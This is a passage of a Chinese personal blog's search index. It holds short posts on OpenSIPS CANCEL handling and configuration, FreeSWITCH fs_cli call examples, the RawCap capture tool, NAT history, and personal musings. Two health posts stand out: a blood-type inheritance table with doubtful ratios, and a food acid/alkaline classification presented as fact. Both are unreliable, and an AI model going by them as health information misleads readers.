/usr/lib64/libc-2.","title":"s"},{"content":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩\n","permalink":"https://wdd.js.org/posts/2020/04/ysx4gz/","summary":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩","title":"老年生活"},{"content":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦耐劳,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。\n","permalink":"https://wdd.js.org/posts/2020/04/oczker/","summary":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦耐劳,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。","title":"简历之吃苦耐劳"},{"content":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然会产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","permalink":"https://wdd.js.org/opensips/ch7/echo-back/","summary":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然会产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","title":"回音问题调研"},{"content":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 
年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","permalink":"https://wdd.js.org/opensips/ch1/story-of-nat/","summary":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","title":"漫话NAT的历史todo"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**. This is required in order to guarantee that the CANCEL will end up (via the same SIP route) in the same place as the INVITE.So, the CANCEL must follow up the INVITE. But how to do and script this?\nIf you run OpenSIPS in a stateless mode, there is no other way then taking care of this at script level – apply the same dialplan and routing decisions for the CANCEL as you did for the INVITE. 
As stateless proxies usually have simple logic, this is not something difficult to do.\nBut what if the routing logic is complex, involving factors that make it hard to reproduce when handling the CANCEL? For example, the INVITE routing may depend on time conditions or dynamic data (that may change at any time).\nIn such cases, you must rely on a stateful routing (SIP transaction based). Basically the transaction engine in OpenSIPS will store and remember the information on where and how the INVITE was routed, so there is not need to “reproduce” that for the CANCEL request – you just fetch it from the transaction context. So, all the heavy lifting is done by the TM (transaction) module – you just have to invoke it:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { t_relay(); exit; } As you can see, there is no need to do any explicit routing for CANCEL requests – you just ask TM module to do it for you – as soon as the module sees you try to route a CANCEL,** it will automatically fetch the needed information from the INVITE transaction and set the proper routing **– all this magic happens inside the t_relay() function.\nNow, OpenSIPS is a multi-process application and INVITE requests may take time to be routed (due complex logic involving external queries or I/Os like DB, REST or others). So, you may end up with OpenSIPS handing the INVITE request in one process (for some time) while the corresponding CANCEL request starts being handled in another process. This may lead to some race conditions – if the INVITE is not yet processed and routed out, how will OpenSIPS know what to do with the CANCEL??\n多进程模式下的INVITE和CANCEL可能会导致条件竞争\nWell, if you cannot solve a race condition, better avoid it :). How? Postpone the CANCEL processing until the INVITE is done and routed. How? 
If there is no transaction created yet for the INVITE, avoid handling the CANCEL by simply dropping it – no worries, we will not lose the CANCEL as by dropping it, we will force the caller device to resend it over again.\nSo, we enhance our CANCEL scripting by checking for the INVITE transaction – this can be done via the t_check_trans() function. If we do not find the INVITE transaction, simple exit to drop the CANCEL request:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } 如何控制CANCEL请求Reason头? Propagating a correct Reason info in the CANCEL requests is equally important. For example, depending on the Reason for the canceled incoming call, a callee device may report it as a missed call (if the Reason header indicates a caller cancelling) or not (if the Reason header indicates that the call has established somewhere else, due to parallel forking).\nSo, you need to pay attention to propagating or inserting the Reason info into the CANCEL requests!For CANCEL requests built by OpenSIPS , the Reason header is inserted all the time, in order to reflect the reason for generating the CANCEL:\nSIP;cause=480;text=”NO_ANSWER” – if the cancelling was a result of an INVITE timeout; SIP;cause=200;text=”Call completed elsewhere” – if the cancelling was due to parallel forking (another branch of the call was answered); SIP;cause=487;text=”ORIGINATOR_CANCEL” – if the cancelling was received from a previous SIP hop (due an incoming CANCEL). So,** by default, OpenSIPS will discard the Reason info for the CANCEL requests that are received and relayed further** (and force the “ORIGINATOR_CANCEL” reason). But there are many cases when you want to keep and propagate further the incoming Reason header. 
To do that, you need to set the “0x08” flag when calling the t_relay() function for the CANCEL:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) # preserve the received Reason header t_relay(\u0026#34;8\u0026#34;); exit; } If there is no Reason in the incoming CANCEL, the default one will be inserted by OpenSIPS in the outgoing CANCEL.Even more, starting with the 2.3 version, OpenSIPS allows you to inject your own Reason header, by using the t_add_cancel_reason() function:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) { t_add_cancel_reason(\u0026#39;Reason: SIP ;cause=200;text=\u0026#34;Call completed elsewhere\u0026#34;\\r\\n\u0026#39;); t_relay(); } exit; } This function gives you full control over the Reason header and allows various implementation of complex scenarios, especially SBC and front-end like.\n","permalink":"https://wdd.js.org/opensips/blog/cancel-reason/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? 
According to RFC 3261,** a CANCEL must be routed to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**.","title":"CANCEL请求和Reason头"},{"content":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\.\pipe\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0. IP : 169.254.63.243 NIC Name : Local Area Connection NIC Type : Ethernet 1. IP : 192.168.1.129 NIC Name : WiFi NIC Type : Wireless80211 2. IP : 127.0.0.1 NIC Name : Loopback Pseudo-Interface 1 NIC Type : Loopback 3. 
IP : 10.165.240.132 NIC Name : Mobile 12 NIC Type : Wwanpp Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k :::warning 注意:\n执行RawCap.exe的时候,不要用 ./RawCap.exe , 直接用文件名 RawCap.exe 加执行参数 RawCap的功能很弱,没有包过滤。只能指定网卡抓包,然后保存为文件。 ::: 抓指定网卡的包 Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k 参考 https://www.netresec.com/?page=RawCap\n附件 附件中有两个版本的rawcap文件。\nraw-cap.zip ","permalink":"https://wdd.js.org/posts/2020/04/pfkelh/","summary":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0.","title":"window轻量级抓包工具RawCap介绍"},{"content":"\n1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 
发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.wav) # 播放音乐 2.5 呼叫并录音 originate user/1000 \u0026amp;record(/tmp/vocie_of_alice.wav) # 呼叫并录音 2.6 同振与顺振 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.7 经过特定SIP服务器 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.8 忽略early media originate {ignore_early_media=true}user/1000 \u0026amp;echo 2.9 播放假的early media originate {transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.10 立即播放early media originate {instant_ringback=true}{transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.11 设置外显号码 originate {origination_callee_id_name=7777}user/1000 通道变量将影响呼叫的行为。fs的通道变量非常多,就不再一一列举。具体可以参考。下面的链接\nhttps://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables#app-switcher https://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables+Catalog ","permalink":"https://wdd.js.org/freeswitch/fs-cli-example/","summary":"1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 
发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.","title":"fs_cli 例子"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, 
\u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;single-instance-no-db\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. 
if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). 
route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } # absorb retransmissions, but do not create transaction t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay Forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); 
t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/default/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.","title":"默认脚本"},{"content":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。\n","permalink":"https://wdd.js.org/posts/2020/04/pgwzdz/","summary":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。","title":"大数据时代的平民新装"},{"content":" 之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。\n","permalink":"https://wdd.js.org/posts/2020/04/vhovyr/","summary":"之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 
虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。","title":"孩子血型一定和父母血型相同吗?"},{"content":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","permalink":"https://wdd.js.org/posts/2020/04/ly7nlv/","summary":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","title":"食物的酸碱性的误解"},{"content":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅\n","permalink":"https://wdd.js.org/posts/2020/03/wyeo4w/","summary":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅","title":"代码增肥赋"},{"content":"","permalink":"https://wdd.js.org/posts/2020/03/eaikcr/","summary":"","title":"devicemap 驱动模式修改"},{"content":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 
